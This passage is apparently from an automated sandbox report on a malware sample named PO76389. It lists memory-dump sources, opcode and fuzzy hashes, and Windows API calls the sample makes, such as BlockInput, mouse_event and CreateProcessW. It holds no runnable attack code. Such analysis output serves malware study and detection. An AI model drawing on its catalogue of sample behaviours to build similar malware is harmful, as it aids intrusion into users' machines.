                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                    • String ID:
                                                    • API String ID: 2356834413-0
                                                    • Opcode ID: 06c3f5b603f361df0952d7b7e76552d65d2f25c9b746905b0f50922e728f09e7
                                                    • Instruction ID: 9de0cd9fd975e03e6d7542fb6075b5fe737cb6f12f2e5501f5b016d7bc6e0640
                                                    • Opcode Fuzzy Hash: 06c3f5b603f361df0952d7b7e76552d65d2f25c9b746905b0f50922e728f09e7
                                                    • Instruction Fuzzy Hash: C2F0A035200229ABDB14AF19DC0AEBE3FA1FF00794F044019FD1A1A1A1D77698B1EBE5
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,004CAF40,?,?,?,?,?), ref: 004CB83B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogLongNtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 2065330234-0
                                                    • Opcode ID: 9afa1f77e71bb099eec76f4a81172a671d35b115446a98f1191b1af954074497
                                                    • Instruction ID: e62c90ee70997b26a7d79edadd6878c67132977ef8fbe926ee978f1a71714d6e
                                                    • Opcode Fuzzy Hash: 9afa1f77e71bb099eec76f4a81172a671d35b115446a98f1191b1af954074497
                                                    • Instruction Fuzzy Hash: 8FF054345002099FDB14AF18E851E393BB6FB15360F10412DF956472A1D771D860FBA5
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 00507057
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: c31118b359e63b14f4b73b837e4a564745feabf1b5f112daafdbcf2f663ca3b8
                                                    • Instruction ID: ef3789008aeb417bb87717b447286872985036ecf3c3e96f430c9a130e28e859
                                                    • Opcode Fuzzy Hash: c31118b359e63b14f4b73b837e4a564745feabf1b5f112daafdbcf2f663ca3b8
                                                    • Instruction Fuzzy Hash: 85E012366142049FC7109B6AD859E9AB7ECAF58750F00842BB945D7291DAB4E8049BA0
                                                    APIs
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0051F41A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogNtdllProc_
                                                    • String ID:
                                                    • API String ID: 3239928679-0
                                                    • Opcode ID: 8976b4b8a40ef1434f2ad5df5ecbd0bbb617ac2eb6fdd5639379e517a840c25a
                                                    • Instruction ID: 53223d305fb22b8a4cc8cf4abff39967067f4be4c509e3cd120a9fff629f3dd9
                                                    • Opcode Fuzzy Hash: 8976b4b8a40ef1434f2ad5df5ecbd0bbb617ac2eb6fdd5639379e517a840c25a
                                                    • Instruction Fuzzy Hash: E1F06D32200649AFDB21DF58EC09FD63FA5FB15360F148418BA25672E1CB716860E7A5
                                                    APIs
                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 004F7DF8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: a791a73110f11c7ccac1c3446b0ab37200a28e18cc677823eff44ce49605ac84
                                                    • Instruction ID: 9117a59b7f989b2817a0310d4a4206a83bfcad1fb24b813bfc77bf396e9e4a0a
                                                    • Opcode Fuzzy Hash: a791a73110f11c7ccac1c3446b0ab37200a28e18cc677823eff44ce49605ac84
                                                    • Instruction Fuzzy Hash: 69D09EA516C60E79FD5907209C2FFBB1119EB517C1FE4564BB301C62C1ECDC6845643D
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 004CACC7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogLongNtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 2065330234-0
                                                    • Opcode ID: 693fdf38433280f2c783828e304c305d511a4397eb55a51e62f15bb61dd875a8
                                                    • Instruction ID: fc1f8a5f5f7810b4654b1348b4648fa94badea1d49658d924094ea9f8ed69426
                                                    • Opcode Fuzzy Hash: 693fdf38433280f2c783828e304c305d511a4397eb55a51e62f15bb61dd875a8
                                                    • Instruction Fuzzy Hash: 77E08C35100208FBCF04AF94EC01F243B36FB48348F10801CF6194A2A1CB33A422FB15
                                                    APIs
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0052F3D4,?,?,?,?,?,?), ref: 0051F450
                                                      • Part of subcall function 0051E13E: _memset.LIBCMT ref: 0051E14D
                                                      • Part of subcall function 0051E13E: _memset.LIBCMT ref: 0051E15C
                                                      • Part of subcall function 0051E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00573EE0,00573F24), ref: 0051E18B
                                                      • Part of subcall function 0051E13E: CloseHandle.KERNEL32 ref: 0051E19D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                    • String ID:
                                                    • API String ID: 2364484715-0
                                                    • Opcode ID: 41ab25e44d10eae5661869766d493dc13e31814bc1ac6ca2245a74064d43b398
                                                    • Instruction ID: 249493e477c5b1f23e9de0492ec0611a8fbece98ff39e0e8810d92c26e8cb304
                                                    • Opcode Fuzzy Hash: 41ab25e44d10eae5661869766d493dc13e31814bc1ac6ca2245a74064d43b398
                                                    • Instruction Fuzzy Hash: 31E01232100209EFDB01AF48EC05E963BB2FB08350F008010FA04572B1C771ACA0EF51
                                                    APIs
                                                    • NtdllDialogWndProc_W.NTDLL ref: 0051F3A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogNtdllProc_
                                                    • String ID:
                                                    • API String ID: 3239928679-0
                                                    • Opcode ID: 536bb026cc131ff438f167ee8ccbb211be85986006090aa1077775df9b54b37f
                                                    • Instruction ID: efd384ec4f3554b10997682226f65d3aee7334e2e2a1f7f8b8b0d39ff4055046
                                                    • Opcode Fuzzy Hash: 536bb026cc131ff438f167ee8ccbb211be85986006090aa1077775df9b54b37f
                                                    • Instruction Fuzzy Hash: B5E0E23520420CEFCB01DF88EC44E863BA5FB2A350F000054FD048B361C772A830EB62
                                                    APIs
                                                    • NtdllDialogWndProc_W.NTDLL ref: 0051F3D0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogNtdllProc_
                                                    • String ID:
                                                    • API String ID: 3239928679-0
                                                    • Opcode ID: 4530d2669a63ecf28c6555ab841044114922108d4db0b8c7d974e4dd443eaad9
                                                    • Instruction ID: aec6f834f9ff465a30ad922716bfdeee2749a036e003abd32ff758be7590e54e
                                                    • Opcode Fuzzy Hash: 4530d2669a63ecf28c6555ab841044114922108d4db0b8c7d974e4dd443eaad9
                                                    • Instruction Fuzzy Hash: 7AE0E23520020CEFCB01DF88E844E863BA5FB2A350F000054FD048B362C772A874EBA2
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                      • Part of subcall function 004CB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004CB85B), ref: 004CB926
                                                      • Part of subcall function 004CB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 004CB9BD
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,004CAF1E,?,?), ref: 004CB864
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                    • String ID:
                                                    • API String ID: 2797419724-0
                                                    • Opcode ID: e7cf8271873f9827a2f5d868b0f182680abee1432455bda249be013a0d36d966
                                                    • Instruction ID: 644c5d6aa93a5e080b92c2423e0e74513738e41e1deb2ae884bc2e901ace0a25
                                                    • Opcode Fuzzy Hash: e7cf8271873f9827a2f5d868b0f182680abee1432455bda249be013a0d36d966
                                                    • Instruction Fuzzy Hash: 99D0127514430C77DB103B66EC07F493E6DEB10754F50842DF605691E18B766420B5BD
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: 7a02b4276d7fe75c469021ebc7cd110832a92e2d61546a2ff8872db639c6aa3b
                                                    • Instruction ID: 37d858c9a643de2cf0ea8e15aff1ea8b884f43ef1af89474732bd0039ac344bd
                                                    • Opcode Fuzzy Hash: 7a02b4276d7fe75c469021ebc7cd110832a92e2d61546a2ff8872db639c6aa3b
                                                    • Instruction Fuzzy Hash: 46C04CB140401DDFD715CB80D9499EFB7BCBB14300F104495A115E1140D7709B459B71
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 004D8E1F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 4c57746095bbec24639338e4ca5d1d0878b3746848726be699e092cabaec55a4
                                                    • Instruction ID: 4cf943df9b69f32bb2e1efac5a7b956e88ba0c4b13491cc03be9de2783574d86
                                                    • Opcode Fuzzy Hash: 4c57746095bbec24639338e4ca5d1d0878b3746848726be699e092cabaec55a4
                                                    • Instruction Fuzzy Hash: 7CA0243000050CF7CF001F51FC044447F7CD7041507004010F40C41131C7335C1055D1
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(004D6AE9,005667D8,00000014), ref: 004DA937
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: 630bcbcfec3cd3f93bb8b9c043607580e5aa51b308d499465e10d96d3e1cf12c
                                                    • Instruction ID: 20740c7f761e930f9ceb432e5b1f6231eb8c56b68af69659e7c6062a416d8d85
                                                    • Opcode Fuzzy Hash: 630bcbcfec3cd3f93bb8b9c043607580e5aa51b308d499465e10d96d3e1cf12c
                                                    • Instruction Fuzzy Hash: 1CB012B03031028BD7084B38FC5411A79F45759101301503D7407C36A0DB308454FF00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                    • Instruction ID: d7c450a05304a7b8df95740e122e2e54414d041f643437ea2c958e9208378171
                                                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                    • Instruction Fuzzy Hash: 06C1D37220519349DF2D463AC43453FFAA15AB27B171A07AFD8B3CB7D0EE28C564D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                    • Instruction ID: ee1276db8fe123698a3947527a5b5bdabf0f3ed0a5f5c4fca6921ce264d4e3a8
                                                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                    • Instruction Fuzzy Hash: E1C1A5722051934ADF2D4639C47453FBAA15AB27B131A076FD8B3CB7E4EE2CC524D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                    • Instruction ID: f75f94b3e2d802c6c6bc6ade5a26789d1f10ac9b0e772c049a7d2f6efbccfa53
                                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                    • Instruction Fuzzy Hash: 05C1C27220919349DF2D8639843463FBBA15AB27B5B1A076FD4B3CB7C0EE28D524D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction ID: 6278b46532a002930161354ec8d8fb71763622f11a0aca5ff934a780a6edf616
                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction Fuzzy Hash: C9C1D37220519349DF2D463A843463FBBA15EB27B170A076FE4B3CB7C5EE28D524E624
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 0050A7A5
